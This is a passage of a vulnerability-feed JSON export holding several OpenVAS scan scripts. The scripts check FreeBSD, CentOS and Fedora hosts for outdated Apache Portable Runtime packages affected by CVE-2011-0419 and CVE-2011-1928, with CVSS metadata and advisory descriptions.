ver:\"1.2.12-5+lenny4\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapr1-dev\", ver:\"1.2.12-5+lenny4\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapr1\", ver:\"1.4.2-6+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapr1-dbg\", ver:\"1.4.2-6+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapr1-dev\", ver:\"1.4.2-6+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapr1\", ver:\"1.4.5-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapr1-dbg\", ver:\"1.4.5-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapr1-dev\", ver:\"1.4.5-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:39:31", "description": "The remote host is missing an update to the system\n as announced in the referenced advisory.", "cvss3": {}, "published": "2011-08-03T00:00:00", "type": "openvas", "title": "FreeBSD Ports: apr1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2018-10-05T00:00:00", "id": "OPENVAS:136141256231069762", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231069762", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: freebsd_apr1.nasl 11762 2018-10-05 10:54:12Z cfischer $\n#\n# Auto generated from VID 99a5590c-857e-11e0-96b7-00300582f9fc\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.69762\");\n script_version(\"$Revision: 11762 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-05 12:54:12 +0200 (Fri, 05 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-03 04:36:20 +0200 (Wed, 03 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2011-1928\", \"CVE-2011-0419\");\n script_bugtraq_id(47929);\n script_name(\"FreeBSD Ports: apr1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsd\", \"ssh/login/freebsdrel\");\n\n script_tag(name:\"insight\", value:\"The following package is affected: apr1\n\nCVE-2011-1928\nThe fnmatch implementation in apr_fnmatch.c in the Apache Portable\nRuntime (APR) library 1.4.3 and 1.4.4, and the Apache HTTP Server\n2.2.18, allows remote attackers to cause a denial of service (infinite\nloop) via a URI that does not match unspecified types of wildcard\npatterns, as demonstrated by attacks against mod_autoindex in httpd\nwhen a /*/WEB-INF/ configuration pattern is used. NOTE: this issue\nexists because of an incorrect fix for CVE-2011-0419.\n\nCVE-2011-0419\nStack consumption vulnerability in the fnmatch implementation in\napr_fnmatch.c in the Apache Portable Runtime (APR) library before\n1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in\nlibc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle\nSolaris 10, and Android, allows context-dependent attackers to cause a\ndenial of service (CPU and memory consumption) via *? sequences in the\nfirst argument, as demonstrated by attacks against mod_autoindex in\nhttpd.\");\n\n script_tag(name:\"solution\", value:\"Update your system with the appropriate patches or\n software upgrades.\");\n\n script_xref(name:\"URL\", value:\"http://www.apache.org/dist/apr/Announcement1.x.html\");\n script_xref(name:\"URL\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2011-1928\");\n script_xref(name:\"URL\", value:\"http://www.vuxml.org/freebsd/99a5590c-857e-11e0-96b7-00300582f9fc.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update to the system\n as announced in the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-bsd.inc\");\n\nvuln = FALSE;\ntxt = \"\";\n\nbver = portver(pkg:\"apr1\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.4.5.1.3.12\")<0) {\n txt += 'Package apr1 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\n\nif(vuln) {\n security_message(data:txt);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:39:02", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for apr CESA-2011:0844 centos4 x86_64", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881291", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881291", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for apr CESA-2011:0844 centos4 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2011-June/017608.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881291\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:18:50 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-1928\", \"CVE-2011-0419\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"CESA\", value:\"2011:0844\");\n script_name(\"CentOS Update for apr CESA-2011:0844 centos4 x86_64\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apr'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS4\");\n script_tag(name:\"affected\", value:\"apr on CentOS 4\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"The Apache Portable Runtime (APR) is a portability library used by the\n Apache HTTP Server and other projects. It provides a free library of C data\n structures and routines.\n\n The fix for CVE-2011-0419 (released via RHSA-2011:0507) introduced an\n infinite loop flaw in the apr_fnmatch() function when the APR_FNM_PATHNAME\n matching flag was used. A remote attacker could possibly use this flaw to\n cause a denial of service on an application using the apr_fnmatch()\n function. (CVE-2011-1928)\n\n Note: This problem affected httpd configurations using the 'Location'\n directive with wildcard URLs. The denial of service could have been\n triggered during normal operation. It did not specifically require a\n malicious HTTP request.\n\n This update also addresses additional problems introduced by the rewrite of\n the apr_fnmatch() function, which was necessary to address the\n CVE-2011-0419 flaw.\n\n All apr users should upgrade to these updated packages, which contain a\n backported patch to correct this issue. Applications using the apr library,\n such as httpd, must be restarted for this update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~0.9.4~26.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-devel\", rpm:\"apr-devel~0.9.4~26.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:38:56", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-03-07T00:00:00", "type": "openvas", "title": "Fedora Update for apr FEDORA-2012-1656", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2012-0840"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863756", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863756", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for apr FEDORA-2012-1656\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-March/074140.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863756\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-07 11:17:05 +0530 (Wed, 07 Mar 2012)\");\n script_cve_id(\"CVE-2012-0840\", \"CVE-2011-0419\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-1656\");\n script_name(\"Fedora Update for apr FEDORA-2012-1656\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apr'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC15\");\n script_tag(name:\"affected\", value:\"apr on Fedora 15\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.4.6~1.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-02T21:13:34", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "cvss3": {}, "published": "2011-08-03T00:00:00", "type": "openvas", "title": "FreeBSD Ports: apr1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2017-02-25T00:00:00", "id": "OPENVAS:69762", "href": "http://plugins.openvas.org/nasl.php?oid=69762", "sourceData": "#\n#VID 99a5590c-857e-11e0-96b7-00300582f9fc\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 99a5590c-857e-11e0-96b7-00300582f9fc\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: apr1\n\nCVE-2011-1928\nThe fnmatch implementation in apr_fnmatch.c in the Apache Portable\nRuntime (APR) library 1.4.3 and 1.4.4, and the Apache HTTP Server\n2.2.18, allows remote attackers to cause a denial of service (infinite\nloop) via a URI that does not match unspecified types of wildcard\npatterns, as demonstrated by attacks against mod_autoindex in httpd\nwhen a /*/WEB-INF/ configuration pattern is used. NOTE: this issue\nexists because of an incorrect fix for CVE-2011-0419.\n\nCVE-2011-0419\nStack consumption vulnerability in the fnmatch implementation in\napr_fnmatch.c in the Apache Portable Runtime (APR) library before\n1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in\nlibc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle\nSolaris 10, and Android, allows context-dependent attackers to cause a\ndenial of service (CPU and memory consumption) via *? sequences in the\nfirst argument, as demonstrated by attacks against mod_autoindex in\nhttpd.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.apache.org/dist/apr/Announcement1.x.html\nhttps://bugzilla.redhat.com/show_bug.cgi?id=CVE-2011-1928\nhttp://www.vuxml.org/freebsd/99a5590c-857e-11e0-96b7-00300582f9fc.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\n\nif(description)\n{\n script_id(69762);\n script_version(\"$Revision: 5424 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-25 17:52:36 +0100 (Sat, 25 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-03 04:36:20 +0200 (Wed, 03 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2011-1928\", \"CVE-2011-0419\");\n script_bugtraq_id(47929);\n script_name(\"FreeBSD Ports: apr1\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"apr1\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.4.5.1.3.12\")<0) {\n txt += 'Package apr1 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:29", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-06-06T00:00:00", "type": "openvas", "title": "Fedora Update for apr FEDORA-2011-6918", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863124", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863124", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for apr FEDORA-2011-6918\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-June/061177.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863124\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-06 16:56:27 +0200 (Mon, 06 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"FEDORA\", value:\"2011-6918\");\n script_cve_id(\"CVE-2011-0419\", \"CVE-2011-1928\");\n script_name(\"Fedora Update for apr FEDORA-2011-6918\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apr'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC14\");\n script_tag(name:\"affected\", value:\"apr on Fedora 14\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.4.5~1.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-25T10:55:42", "description": "Check for the Version of apr", "cvss3": {}, "published": "2011-06-06T00:00:00", "type": "openvas", "title": "CentOS Update for apr CESA-2011:0844 centos4 i386", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:880490", "href": "http://plugins.openvas.org/nasl.php?oid=880490", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for apr CESA-2011:0844 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache Portable Runtime (APR) is a portability library used by the\n Apache HTTP Server and other projects. It provides a free library of C data\n structures and routines.\n\n The fix for CVE-2011-0419 (released via RHSA-2011:0507) introduced an\n infinite loop flaw in the apr_fnmatch() function when the APR_FNM_PATHNAME\n matching flag was used. A remote attacker could possibly use this flaw to\n cause a denial of service on an application using the apr_fnmatch()\n function. (CVE-2011-1928)\n \n Note: This problem affected httpd configurations using the "Location"\n directive with wildcard URLs. The denial of service could have been\n triggered during normal operation; it did not specifically require a\n malicious HTTP request.\n \n This update also addresses additional problems introduced by the rewrite of\n the apr_fnmatch() function, which was necessary to address the\n CVE-2011-0419 flaw.\n \n All apr users should upgrade to these updated packages, which contain a\n backported patch to correct this issue. Applications using the apr library,\n such as httpd, must be restarted for this update to take effect.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"apr on CentOS 4\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2011-June/017607.html\");\n script_id(880490);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-06 16:56:27 +0200 (Mon, 06 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"CESA\", value: \"2011:0844\");\n script_cve_id(\"CVE-2011-1928\", \"CVE-2011-0419\");\n script_name(\"CentOS Update for apr CESA-2011:0844 centos4 i386\");\n\n script_summary(\"Check for the Version of apr\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~0.9.4~26.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-devel\", rpm:\"apr-devel~0.9.4~26.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-02T10:57:31", "description": "Check for the Version of apr", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for apr CESA-2011:0844 centos4 x86_64", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2018-01-02T00:00:00", "id": "OPENVAS:881291", "href": "http://plugins.openvas.org/nasl.php?oid=881291", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for apr CESA-2011:0844 centos4 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache Portable Runtime (APR) is a portability library used by the\n Apache HTTP Server and other projects. It provides a free library of C data\n structures and routines.\n\n The fix for CVE-2011-0419 (released via RHSA-2011:0507) introduced an\n infinite loop flaw in the apr_fnmatch() function when the APR_FNM_PATHNAME\n matching flag was used. A remote attacker could possibly use this flaw to\n cause a denial of service on an application using the apr_fnmatch()\n function. (CVE-2011-1928)\n \n Note: This problem affected httpd configurations using the "Location"\n directive with wildcard URLs. The denial of service could have been\n triggered during normal operation; it did not specifically require a\n malicious HTTP request.\n \n This update also addresses additional problems introduced by the rewrite of\n the apr_fnmatch() function, which was necessary to address the\n CVE-2011-0419 flaw.\n \n All apr users should upgrade to these updated packages, which contain a\n backported patch to correct this issue. Applications using the apr library,\n such as httpd, must be restarted for this update to take effect.\";\n\ntag_affected = \"apr on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2011-June/017608.html\");\n script_id(881291);\n script_version(\"$Revision: 8267 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-02 07:29:17 +0100 (Tue, 02 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:18:50 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-1928\", \"CVE-2011-0419\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"CESA\", value: \"2011:0844\");\n script_name(\"CentOS Update for apr CESA-2011:0844 centos4 x86_64\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of apr\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~0.9.4~26.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-devel\", rpm:\"apr-devel~0.9.4~26.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-06T13:06:30", "description": "Check for the Version of apr", 